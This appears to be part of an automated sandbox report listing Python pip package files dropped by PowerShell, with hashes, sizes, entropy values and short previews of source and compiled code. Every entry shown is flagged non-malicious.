                              SHA-512:102286AFB35EF9EF3220FC4C247DE22139FE05A0DE995288E0DF1FC997DD4396F87CCF2C9505B5EF82FC2FF9A3D0B8043A03BF80903B5785AC34C00D44065727
                              Malicious:false
                              Preview:import os.import string.import urllib.parse.import urllib.request.from typing import Optional..from .compat import WINDOWS...def get_url_scheme(url: str) -> Optional[str]:. if ":" not in url:. return None. return url.split(":", 1)[0].lower()...def path_to_url(path: str) -> str:. """. Convert a path to a file: URL. The path will be made absolute and have. quoted path parts.. """. path = os.path.normpath(os.path.abspath(path)). url = urllib.parse.urljoin("file:", urllib.request.pathname2url(path)). return url...def url_to_path(url: str) -> str:. """. Convert a file: URL to a path.. """. assert url.startswith(. "file:". ), f"You can only turn file: urls into filenames (not {url!r})".. _, netloc, path, _, _ = urllib.parse.urlsplit(url).. if not netloc or netloc == "localhost":. # According to RFC 8089, same as empty authority.. netloc = "". elif WINDOWS:. # If we have a UNC path, prepend UNC share notati
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3456
                              Entropy (8bit):4.796313154979711
                              Encrypted:false
                              SSDEEP:96:ri5HUYfOUVBSjKR1d0JK1PTgBHHf5VjeY3jowoVEod7MOSQiy7d1G/:ryf/sKRb0cPTCBtpoeox/SQDfG/
                              MD5:15111B45000FB18281FB5DFE8DC4EF70
                              SHA1:14CB66AA6EA7945B643769280466DA0FD10FEBAC
                              SHA-256:4BA7FB72C628AD1A620FA72F9F78C849961CDC8F0F242E371F988C1694401035
                              SHA-512:16A2360E23C1CFBFABF4F171B4D989094B8FE9F8AA6842930D5C8BD6DCED85DE206B448DF5F29E3495A95A0E5495813AB4049A015B04B3905D62E86BB8DFF678
                              Malicious:false
                              Preview:import logging.import os.import re.import site.import sys.from typing import List, Optional..logger = logging.getLogger(__name__)._INCLUDE_SYSTEM_SITE_PACKAGES_REGEX = re.compile(. r"include-system-site-packages\s*=\s*(?P<value>true|false)".)...def _running_under_venv() -> bool:. """Checks if sys.base_prefix and sys.prefix match... This handles PEP 405 compliant virtual environments.. """. return sys.prefix != getattr(sys, "base_prefix", sys.prefix)...def _running_under_legacy_virtualenv() -> bool:. """Checks if sys.real_prefix is set... This handles virtual environments created with pypa's virtualenv.. """. # pypa/virtualenv case. return hasattr(sys, "real_prefix")...def running_under_virtualenv() -> bool:. """True if we're running inside a virtual environment, False otherwise.""". return _running_under_venv() or _running_under_legacy_virtualenv()...def _get_pyvenv_cfg_lines() -> Optional[List[str]]:. """Reads {sys.prefix}/pyvenv.cfg and returns
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4499
                              Entropy (8bit):4.752610172437855
                              Encrypted:false
                              SSDEEP:96:KrIg+2rhcy2TRgR/1XRLrDtNxu5Sfs8nkm2dHwvqwBfg8g4k:klplYtgRLLrhNYUfs89f5B4h4k
                              MD5:576FFCEAB3FF43B59DACB1950B7A734B
                              SHA1:EBEBECB94DF0AEE12848FE846E7D2CAF9FB617AE
                              SHA-256:8B807050D1DAB6DCCDD22C72DC7040174E2D64F461D82731693EADF3ABE2C241
                              SHA-512:8640CCB2B119FAB0AD265CAB76EF24970ABF9CFF26588D85606F5317C195F233D044A7485631F795EB40C79DFAF2CD1669D57AEA955EA01230D04527E3F484AD
                              Malicious:false
                              Preview:"""Support functions for working with wheel files.."""..import logging.from email.message import Message.from email.parser import Parser.from typing import Tuple.from zipfile import BadZipFile, ZipFile..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import UnsupportedWheel..VERSION_COMPATIBLE = (1, 0)...logger = logging.getLogger(__name__)...def parse_wheel(wheel_zip: ZipFile, name: str) -> Tuple[str, Message]:. """Extract information from the provided wheel, ensuring it meets basic. standards... Returns the name of the .dist-info directory and the parsed WHEEL metadata.. """. try:. info_dir = wheel_dist_info_dir(wheel_zip, name). metadata = wheel_metadata(wheel_zip, info_dir). version = wheel_version(metadata). except UnsupportedWheel as e:. raise UnsupportedWheel(f"{name} has an invalid wheel, {str(e)}").. check_compatibility(version, name).. return info_dir, metadata...def wheel_dist_info_d
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):596
                              Entropy (8bit):4.658154431455551
                              Encrypted:false
                              SSDEEP:12:AU7ndNAXB6D5dBZnM4mSMWgeXgkJVEOwsfJs3CKnBu:A1YDj/nM4Y3eXguVooJcBu
                              MD5:EBA6BD4ACA847FBF75D548FF07627DDC
                              SHA1:DDF20F97603F281DC422347D7B063A0C31D728B7
                              SHA-256:500AAFCE96E2D156D9A3751BEAC904799030FA8A08651FB35FF5A909BC720A85
                              SHA-512:DC6F2589DE14F458DA792AD235E62175B72AA1A97934F9717895AAFFFC2DB8CD70B6EEFF5763ACC92212646576E13F76E6EF9792F872DDB1D537A46979FDA79D
                              Malicious:false
                              Preview:# Expose a limited set of classes and functions so callers outside of.# the vcs package don't need to import deeper than `pip._internal.vcs`..# (The test directory may still need to import from a vcs sub-package.).# Import all vcs modules to register each VCS in the VcsSupport object..import pip._internal.vcs.bazaar.import pip._internal.vcs.git.import pip._internal.vcs.mercurial.import pip._internal.vcs.subversion # noqa: F401.from pip._internal.vcs.versioncontrol import ( # noqa: F401. RemoteNotFoundError,. RemoteNotValidError,. is_url,. make_vcs_requirement_url,. vcs,.).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):540
                              Entropy (8bit):5.3323371996372115
                              Encrypted:false
                              SSDEEP:12:fCaOLegf+W3C/HLV4CFqv8JOs+edImbgjaOt1lIlZn:fBWeciLV4rv8JO+3TOt1lYZ
                              MD5:265B220F6258F9134BB4454190880DC2
                              SHA1:652E64F7E84900CD6454BFD7BCDC2A66D11E7043
                              SHA-256:5BEB7DCDFD686E99B5AB86641993A548A55E963D3FF06A662983F5BFBD266A74
                              SHA-512:672421494BF4CA1DF8E82887B7F8037C73EF772083CA5BEE54EC01E9EE48C4240CE6659620ABFFA454F3A4EBC752CA8DD2EECFF5B5C8AF763F58DF3CAA309DC3
                              Malicious:false
                              Preview:........=.CfT.........................@.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...y.)......N)...RemoteNotFoundError..RemoteNotValidError..is_url..make_vcs_requirement_url..vcs)...pip._internal.vcs.bazaar..pip..pip._internal.vcs.git..pip._internal.vcs.mercurial..pip._internal.vcs.subversion. pip._internal.vcs.versioncontrolr....r....r....r....r............fC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/vcs/__init__.py..<module>r........s............. ....."..#..........r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):5032
                              Entropy (8bit):5.4683448227860945
                              Encrypted:false
                              SSDEEP:96:KcHB7/Dbod6wQhKapNnTrb8ZyW0+sVINRsubU:KcdDbdwQhdXTrb8ZdtsVcsubU
                              MD5:673C28B80CD6E69D7AAADAA073CCC010
                              SHA1:24C13B94E06ED90E6D5AF76B540634501FB07CDD
                              SHA-256:140FE62E1393E6820E56E09FE781D47B647E5FB5D8DC84A1E5047D15A2746C23
                              SHA-512:7C15BBA2A462057CC8E1992C7CEDD8D8E6D9A5A761EBEA51BC221ADAD04835D5CF152C070A36606F03FCC331046DDF44664F1ABCB32A5D91D91B89C8BEBCF6A2
                              Malicious:false
                              Preview:........=.Cf................................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....e.j$..................e.........Z...G.d...d.e.........Z...e.j,..................e...........y.)......N)...List..Optional..Tuple)...HiddenText..display_path)...make_command)...path_to_url)...AuthInfo..RemoteNotFoundError..RevOptions..VersionControl..vcsc.............................e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.e.d.e.e.....f.d...........Z.d.e.d.e.d.e.d.e.d.d.f.d...Z.d.e.d.e.d.e.d.d.f.d...Z.d.e.d.e.d.e.d.d.f.d...Z.e.d.e.d.e.e.e.e.....e.f.....f...f.d...........Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.e.....d.e.f.d...........Z...x.Z.S.)...Bazaar..bzrz..bzr..branch).z.bzr+httpz.bzr+httpsz.bzr+sshz.bzr+sftpz.bzr+ftpz.bzr+lpz.bzr+file..rev..returnc...........................d.|.g.S.).Nz.-r..).r....s.... .dC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/vcs/bazaar.py..get_base_rev_argsz.Bazaar.g
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):19001
                              Entropy (8bit):5.484361340799084
                              Encrypted:false
                              SSDEEP:384:oKv0TY9EX+riHSetNe7wY9iaeuqS84rh0yHV0nxGC:oKv0UKX+rQztNe7wYUaeJS8IPC
                              MD5:01EA8132565CB6F092C8411B2687ED8D
                              SHA1:940C57FA0B65825B9164066A8C491AFA6D81C482
                              SHA-256:F7E11B4E4A23DBD694EFDCEA65960F825404C065F16A4163323433C4A6D1CA94
                              SHA-512:11F974623912B141DC9F3703C4741CA7687D63FE55A1D37E7A6ED5D3C8E308433E026524DAFF776AF9239C186D2EB4ECB0C589A2D1CBD5A4EE7E3FF56A16A5DC
                              Malicious:false
                              Preview:........=.Cf.F..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.j:..................j<..................Z.e.j:..................j>..................Z...e.j@..................e!........Z"..e.jF..................d.........Z$..e.jF..................d.........Z%..e.jF..................d.e.jL..........................Z'd.e(d.e)f.d...Z*..G.d...d.e.........Z+..e.jX..................e+..........y.)......N)...List..Optional..Tuple)...BadCommand..InstallationError)...HiddenText..display_path..hide_url)...make_command)...AuthInfo..RemoteNotFoundError..RemoteNotValidError..RevOptions..VersionControl.(find_path_to_project_root_from_repo_root..vcsz(^git version (\d+)\.(\d+)(?:\.(\d+))?.*$z.^[a-fA-F0-9]{40}$a/...^. # Optional user, e.g. 'git@'. (\w+@)?. # Server, e.g. 'github.com'.. ([^/:]+):. # The server-side path. e.g. 'user/project.git'. Must start w
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7621
                              Entropy (8bit):5.4049869747923625
                              Encrypted:false
                              SSDEEP:192:3vvr0FJal39yWi/G3P6FLCdLBC8QBW8UHoQBYWFvcEfG:370FJaWccCdlC8QfUHLBYevcb
                              MD5:52256CBFFE1895E8213B8E221DC81E29
                              SHA1:FFE2DDE21706C6BE6BE0389BB52A4F137CBBEBB0
                              SHA-256:83DC6296C8A0F6516A2FBADACEBC9FEA61F0954EAC721E14BCA778F24EE34449
                              SHA-512:A100705530BCA2F3677C2E6A73C6CE6F2D505EAA912548CC5099F28FDDB2615C8D308781C3684C4C73CFE033027930CADAAEB37B0C7C21C0387C190140FB7E3F
                              Malicious:false
                              Preview:........=.Cf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....e.j,..................e.........Z...G.d...d.e.........Z...e.j4..................e...........y.)......N)...List..Optional..Tuple)...BadCommand..InstallationError)...HiddenText..display_path)...make_command)...path_to_url)...RevOptions..VersionControl.(find_path_to_project_root_from_repo_root..vcsc.....................F.......e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.e.d.e.e.....f.d...........Z.d.e.d.e.d.e.d.e.d.d.f.d...Z.d.e.d.e.d.e.d.d.f.d...Z.d.e.d.e.d.e.d.d.f.d...Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.e.....d.e.f.d...........Z.e.d.e.d.e.e.....f.d...........Z.e.d.e.d.e.e.....f...f.d...........Z...x.Z.S.)...Mercurial..hgz..hg..clone).z.hg+filez.hg+httpz.hg+httpsz.hg+sshz.hg+static-http..rev..returnc...........................d.|.....g.S.).Nz.--rev=..).r....s.... .gC:\Users\boadi\App
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12493
                              Entropy (8bit):5.518292339291103
                              Encrypted:false
                              SSDEEP:192:Db7UX973b0U61/C77L0RnG4nG+1iG5H5aDq+KdPMRhzd:Db7UX9jh77L0RnGD+19oG+KdPMB
                              MD5:BEEA40197E00CB016751EE0FBEC0A253
                              SHA1:ED39149E51537AC6FC1F3B3FB65F01C90EDC3719
                              SHA-256:14975CEB8EF58F42C51601021F935D171D3C13E87D38DAB018E049BC1F08BE66
                              SHA-512:B2D6029A05DA464C900C9D575AE07BFA7D850A7185F04AF69263973902CDC0A6E7C7E0BB8EF44152152B066947A61632219968019E73D0A6DEA12D699E96911F
                              Malicious:false
                              Preview:........=.Cf.-........................f.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....e.j,..................e.........Z...e.j2..................d.........Z...e.j2..................d.........Z...e.j2..................d.........Z...e.j2..................d.........Z...G.d...d.e.........Z...e.j>..................e...........y.)......N)...List..Optional..Tuple)...HiddenText..display_path..is_console_interactive..is_installable_dir..split_auth_from_netloc)...CommandArgs..make_command)...AuthInfo..RemoteNotFoundError..RevOptions..VersionControl..vcsz.url="([^"]+)"z.committed-rev="(\d+)"z.\s*revision="(\d+)"z.<url>(.*)</url>c.............................e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.e.....f.d...........Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.d.e.e.e.e.e.....e.e.....f.....f.....f...f.d...........Z.e.d.e.d.e.e.e.e.....e.f.....f...f.d...........Z.e.d.e.e.....d.e.e.....d.e.f.d...........Z.e.d.e.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):29019
                              Entropy (8bit):5.407049521906488
                              Encrypted:false
                              SSDEEP:768:0in+3bDTQgj3s0F2KDqv2ZjgBrfhIcBUz31MGl2:bqbnZAKDrhgBrfhIcypJg
                              MD5:0CDECD42F3DFC72190B3624B01B544EF
                              SHA1:34B991432FB0DE81047290BF69CA22B6EAA203EB
                              SHA-256:469D5FF5235B414240A25B7800269201639969B38F2EF18B1BADE042BFDD8AF1
                              SHA-512:8EF6B8692F70B63E44398F23D069C5C58BB42AA2731B6FAD673E8AE027F0139F8251B086B11161FFBDCC87DEF0087B21FD482886F463C13F709957848937B590
                              Malicious:false
                              Preview:........=.Cf.Y..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z ..d.d.l!m"Z"m#Z#m$Z$m%Z%..d.d.l&m'Z'..e.r.d.d.l.m(Z(..d.g.Z)..e.jT..................e+........Z,e.e.e-....e.e-....f.....Z.d.e-d.e/f.d...Z0..d d.e-d.e-d.e-d.e.e-....d.e-f.d...Z1d.e-d.e-d.e.e-....f.d...Z2..G.d...d.e3........Z4..G.d...d.e3........Z5..G.d...d.........Z6..G.d...d.........Z7..e7........Z8..G.d...d.........Z9y.)!z)Handles all VCS (version control) support.....N)...TYPE_CHECKING..Any..Dict..Iterable..Iterator..List..Mapping..Optional..Tuple..Type..Union)...SpinnerInterface)...BadCommand..InstallationError)...HiddenText..ask_path_exists..backup_dir..display_path..hide_url..hide_value..is_installable_dir..rmtree)...CommandArgs..call_subprocess..format_command_args..make_command)...get_url_scheme)...Literal..vcs..name..returnc.....................L.....t.........|.........}.|..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3519
                              Entropy (8bit):4.499327086267654
                              Encrypted:false
                              SSDEEP:48:ZmPMVZM4U1zIpidyCKXDqyoyKjKakIVvgOQ4TOSpc0wvXTpNchwF:ZmPMVzU1kpcyC1GhIxz9TObjTL3F
                              MD5:6979F5F36DEB062F7105D00723A97792
                              SHA1:44A7790A3F562475C1EC006CBBFCA10C5243DCBA
                              SHA-256:8F4A229F47E91911DC0850B111CA4F090A0512F03E0CC2D42CA7463FC36FEFAA
                              SHA-512:8C949BD62BD76C471E8FD99202A070C4513E65D7A189EEFA63395CAA8A08D67145A49AE5E9DAD05887082B08937F090D55B5F37D0F988FE15F5831C22A4EC30D
                              Malicious:false
                              Preview:import logging.from typing import List, Optional, Tuple..from pip._internal.utils.misc import HiddenText, display_path.from pip._internal.utils.subprocess import make_command.from pip._internal.utils.urls import path_to_url.from pip._internal.vcs.versioncontrol import (. AuthInfo,. RemoteNotFoundError,. RevOptions,. VersionControl,. vcs,.)..logger = logging.getLogger(__name__)...class Bazaar(VersionControl):. name = "bzr". dirname = ".bzr". repo_name = "branch". schemes = (. "bzr+http",. "bzr+https",. "bzr+ssh",. "bzr+sftp",. "bzr+ftp",. "bzr+lp",. "bzr+file",. ).. @staticmethod. def get_base_rev_args(rev: str) -> List[str]:. return ["-r", rev].. def fetch_new(. self, dest: str, url: HiddenText, rev_options: RevOptions, verbosity: int. ) -> None:. rev_display = rev_options.to_display(). logger.info(. "Checking out %s%s to %s",. url,. re
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):18121
                              Entropy (8bit):4.402108087289438
                              Encrypted:false
                              SSDEEP:192:WPx+iyCAZF6bWSBS6EDftgQRhsRir5TvBCyNhEiEls7IdaW6eTTP++2/ap+zu1VO:wHUF6C6EJs4TZC2HfeTTeA+zu7kQ+J
                              MD5:5EC51DECD3CAAFC917F8E420288FB13C
                              SHA1:8B619B071F349B2B977E86AA685B20CBFA344659
                              SHA-256:09E2811899E5EAEB24BEF8E40145EB255C5B1C9AE94BF07FA727C57632F70917
                              SHA-512:6BDCED247288DFA90C8FBA8F23892EE2203CBAA00DBB945E811829FEEAE45AB43AA8A053322902C19AE74A36177D474010ADF2FA648FDC19E3867B46637196E5
                              Malicious:false
                              Preview:import logging.import os.path.import pathlib.import re.import urllib.parse.import urllib.request.from typing import List, Optional, Tuple..from pip._internal.exceptions import BadCommand, InstallationError.from pip._internal.utils.misc import HiddenText, display_path, hide_url.from pip._internal.utils.subprocess import make_command.from pip._internal.vcs.versioncontrol import (. AuthInfo,. RemoteNotFoundError,. RemoteNotValidError,. RevOptions,. VersionControl,. find_path_to_project_root_from_repo_root,. vcs,.)..urlsplit = urllib.parse.urlsplit.urlunsplit = urllib.parse.urlunsplit...logger = logging.getLogger(__name__)...GIT_VERSION_REGEX = re.compile(. r"^git version " # Prefix.. r"(\d+)" # Major.. r"\.(\d+)" # Dot, minor.. r"(?:\.(\d+))?" # Optional dot, patch.. r".*$" # Suffix, including any pre- and post-release segments we don't care about..)..HASH_REGEX = re.compile("^[a-fA-F0-9]{40}$")..# SCP (Secure copy protocol) shorthand. e.g. 'git@ex
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5249
                              Entropy (8bit):4.39870404043357
                              Encrypted:false
                              SSDEEP:96:kdtO5xn1khyvDo0fuVMlR98epnT+amAMGEtQG:cO3nCU7/fWMl78exzMkG
                              MD5:EB530B5A044A306794956925E8011D76
                              SHA1:9F7531C4AB899404633DA9AB7DE6E0610DA47EC0
                              SHA-256:A142CE8732765227BED3A775A2690BFBF19CEA6786694932A20BEA1BD642C8FB
                              SHA-512:CCD2FF40E1217A4B5BF91883BA3ECD4F93A01A37E203E34C53548A9734AB5AF4003A586F46AACAF627DD0088A412E9C66D7D92213A143CC7E1A756E6C96F8F33
                              Malicious:false
                              Preview:import configparser.import logging.import os.from typing import List, Optional, Tuple..from pip._internal.exceptions import BadCommand, InstallationError.from pip._internal.utils.misc import HiddenText, display_path.from pip._internal.utils.subprocess import make_command.from pip._internal.utils.urls import path_to_url.from pip._internal.vcs.versioncontrol import (. RevOptions,. VersionControl,. find_path_to_project_root_from_repo_root,. vcs,.)..logger = logging.getLogger(__name__)...class Mercurial(VersionControl):. name = "hg". dirname = ".hg". repo_name = "clone". schemes = (. "hg+file",. "hg+http",. "hg+https",. "hg+ssh",. "hg+static-http",. ).. @staticmethod. def get_base_rev_args(rev: str) -> List[str]:. return [f"--rev={rev}"].. def fetch_new(. self, dest: str, url: HiddenText, rev_options: RevOptions, verbosity: int. ) -> None:. rev_display = rev_options.to_display(). logger.in
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):11729
                              Entropy (8bit):4.427922742656393
                              Encrypted:false
                              SSDEEP:192:s7+Ctf6S7zirZLMvNsYd6txSG0m8IC1+e:0ff6SuMlsys58ICz
                              MD5:8E17210212AF36BABEE278E0040A42E9
                              SHA1:3EDA4B853ED85B240D41EBDBD1CC242A0102B2D5
                              SHA-256:BE166CF0BF93360817A8CD5B6E197E1696F11374EB201E93827C7C7E1DD2D871
                              SHA-512:CB8F14D81F0DA4883C40A0849927F57DC260294C69DE5EC81EF82C07BE22D17E18D799E479473F8B25A05407692018850CD1E0FFEABCA4340977A562C5DE5B50
                              Malicious:false
                              Preview:import logging.import os.import re.from typing import List, Optional, Tuple..from pip._internal.utils.misc import (. HiddenText,. display_path,. is_console_interactive,. is_installable_dir,. split_auth_from_netloc,.).from pip._internal.utils.subprocess import CommandArgs, make_command.from pip._internal.vcs.versioncontrol import (. AuthInfo,. RemoteNotFoundError,. RevOptions,. VersionControl,. vcs,.)..logger = logging.getLogger(__name__).._svn_xml_url_re = re.compile('url="([^"]+)"')._svn_rev_re = re.compile(r'committed-rev="(\d+)"')._svn_info_xml_rev_re = re.compile(r'\s*revision="(\d+)"')._svn_info_xml_url_re = re.compile(r"<url>(.*)</url>")...class Subversion(VersionControl):. name = "svn". dirname = ".svn". repo_name = "checkout". schemes = ("svn+ssh", "svn+http", "svn+https", "svn+svn", "svn+file").. @classmethod. def should_add_vcs_url_prefix(cls, remote_url: str) -> bool:. return True.. @staticmethod. def get_base_rev_
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):22787
                              Entropy (8bit):4.412390369111583
                              Encrypted:false
                              SSDEEP:384:biAY6U69w0OpUXhEg9ow06ZQFRobCqt0lOFB76:bi70OuxRWjqQFy+qt0lMk
                              MD5:4050ABA66D648DBB1353881A27B6FC7B
                              SHA1:B65AF453851FE273953A60B122CB2BE83441C3F6
                              SHA-256:DDE223B4E318BCE639A8FE813182180D9DFBE424AE79CEA44840746CEA35712B
                              SHA-512:FCC22CB85FB2FF5597A1730C93B7F788D06D14AD5E5B718A8EB3F70A453C2AC0728995804442266C484A37BF3B59231CE78778D56737901AF520D49EE3792E15
                              Malicious:false
                              Preview:"""Handles all VCS (version control) support"""..import logging.import os.import shutil.import sys.import urllib.parse.from typing import (. TYPE_CHECKING,. Any,. Dict,. Iterable,. Iterator,. List,. Mapping,. Optional,. Tuple,. Type,. Union,.)..from pip._internal.cli.spinners import SpinnerInterface.from pip._internal.exceptions import BadCommand, InstallationError.from pip._internal.utils.misc import (. HiddenText,. ask_path_exists,. backup_dir,. display_path,. hide_url,. hide_value,. is_installable_dir,. rmtree,.).from pip._internal.utils.subprocess import (. CommandArgs,. call_subprocess,. format_command_args,. make_command,.).from pip._internal.utils.urls import get_url_scheme..if TYPE_CHECKING:. # Literal was introduced in Python 3.8.. #. # TODO: Remove `if TYPE_CHECKING` when dropping support for Python 3.7.. from typing import Literal...__all__ = ["vcs"]...logger = logging.getLogger(__name__)..AuthI
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):11801
                              Entropy (8bit):4.445807799537282
                              Encrypted:false
                              SSDEEP:192:rbf8kBwT58TRKeTRKOSXx7lXZVr7uNX6CzCMHzmYAd8ljgHb5hFC0FiS19FdLT1L:vUTcf8B7UNX6CfaRzjTc/A
                              MD5:6D538A688C4B4A1B4C1892D5A6EB727E
                              SHA1:7FF104F4E1DD97395031964352FD11292541EC2E
                              SHA-256:A934F3415F05E9BD6336C14275AD534500BC27B80AFA6EE2B913602A8EC38FAF
                              SHA-512:9B6EFEDF74E9EE42445D23F33A6A6CFB0A8427152A853C4DD0337267F4DB7B028B27EDFE9AFFC208D0F1A1674A601895485E38AE82757906D528F0D63AD02D56
                              Malicious:false
                              Preview:"""Orchestrator for building wheels from InstallRequirements.."""..import logging.import os.path.import re.import shutil.from typing import Iterable, List, Optional, Tuple..from pip._vendor.packaging.utils import canonicalize_name, canonicalize_version.from pip._vendor.packaging.version import InvalidVersion, Version..from pip._internal.cache import WheelCache.from pip._internal.exceptions import InvalidWheelFilename, UnsupportedWheel.from pip._internal.metadata import FilesystemWheel, get_wheel_distribution.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.operations.build.wheel import build_wheel_pep517.from pip._internal.operations.build.wheel_editable import build_wheel_editable.from pip._internal.operations.build.wheel_legacy import build_wheel_legacy.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.logging import indent_log.from pip._internal.utils.misc import ensure_dir, hash_file.from
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4993
                              Entropy (8bit):4.706048155714618
                              Encrypted:false
                              SSDEEP:96:OrHde0hpbiPzsYl1tQdWftXBaIrpOnnd7RbQ/bjXOVSKYg9QMAq8BcQZwycyP:Orr5inPQdIRBrpyMP
                              MD5:E757A0BEA2E10105518C3F9B5E1DA457
                              SHA1:D18AD681EBF3B0D236945512222A28AF4EAD58F7
                              SHA-256:539D4D3F05DD03EC173A200D2109DC62370CA7AB7181E38BE671F192C25EC9AB
                              SHA-512:87CAB1B6AD7259234C88357ED7A98297C9B440287BEDB7B25B9AF86908A33EB214CE088D7F6A4E13C8E75116AA3E0490DC27EB74992686E456EE251269E604F3
                              Malicious:false
                              Preview:""".pip._vendor is for vendoring dependencies of pip to prevent needing pip to.depend on something external...Files inside of pip._vendor should be considered immutable and should only be.updated to versions from upstream..""".from __future__ import absolute_import..import glob.import os.path.import sys..# Downstream redistributors which have debundled our dependencies should also.# patch this value to be true. This will trigger the additional patching.# to cause things like "six" to be available as pip..DEBUNDLED = False..# By default, look in this directory for a bunch of .whl files which we will.# add to the beginning of sys.path before attempting to import anything. This.# is done to support downstream re-distributors like Debian and Fedora who.# wish to create their own Wheels for our dependencies to aid in debundling..WHEEL_DIR = os.path.abspath(os.path.dirname(__file__))...# Define a small helper function to alias our vendored modules to the real ones.# if the vendored ones do n
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4702
                              Entropy (8bit):5.436774829292428
                              Encrypted:false
                              SSDEEP:96:wBDCa5RDq0Cmhxz+5l5v75U1y/uzrGzBWJxML58M6LzWsUahOeSt:wBDrzCmhpqGOeSt
                              MD5:73023FE5C0B123E08659E59DB89382A0
                              SHA1:10FC04E51E41FABE8B581A8A75BB229603FB3239
                              SHA-256:C58D11257D607A6F78F278E0C630C82C257244F351E1BDA1F2713A5752F5F476
                              SHA-512:EB8AF4BDD6BB6AB8FDBEB51C1DB869D735722CE466ECCC70BBD3D86A3AD6A087139483ED1678EE7330E8C72C7320890041B2310E0A3FCA40C479C30976EFD08A
                              Malicious:false
                              Preview:........=.Cf................................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.e.j...................j...................e.j...................j...................e.................Z.d...Z.e...r'..e.j...................e.j...................j...................e.d.................e.j...................z...e.j...................d.d.....e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d ............e.d!............e.d"............e.d#............e.d$............e.d%............e.d&............e.d'............e.d(............e.d)............e.d*............e.d+............e.d,............e.d-............e.d.............e.d/..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):41279
                              Entropy (8bit):5.5514286955584815
                              Encrypted:false
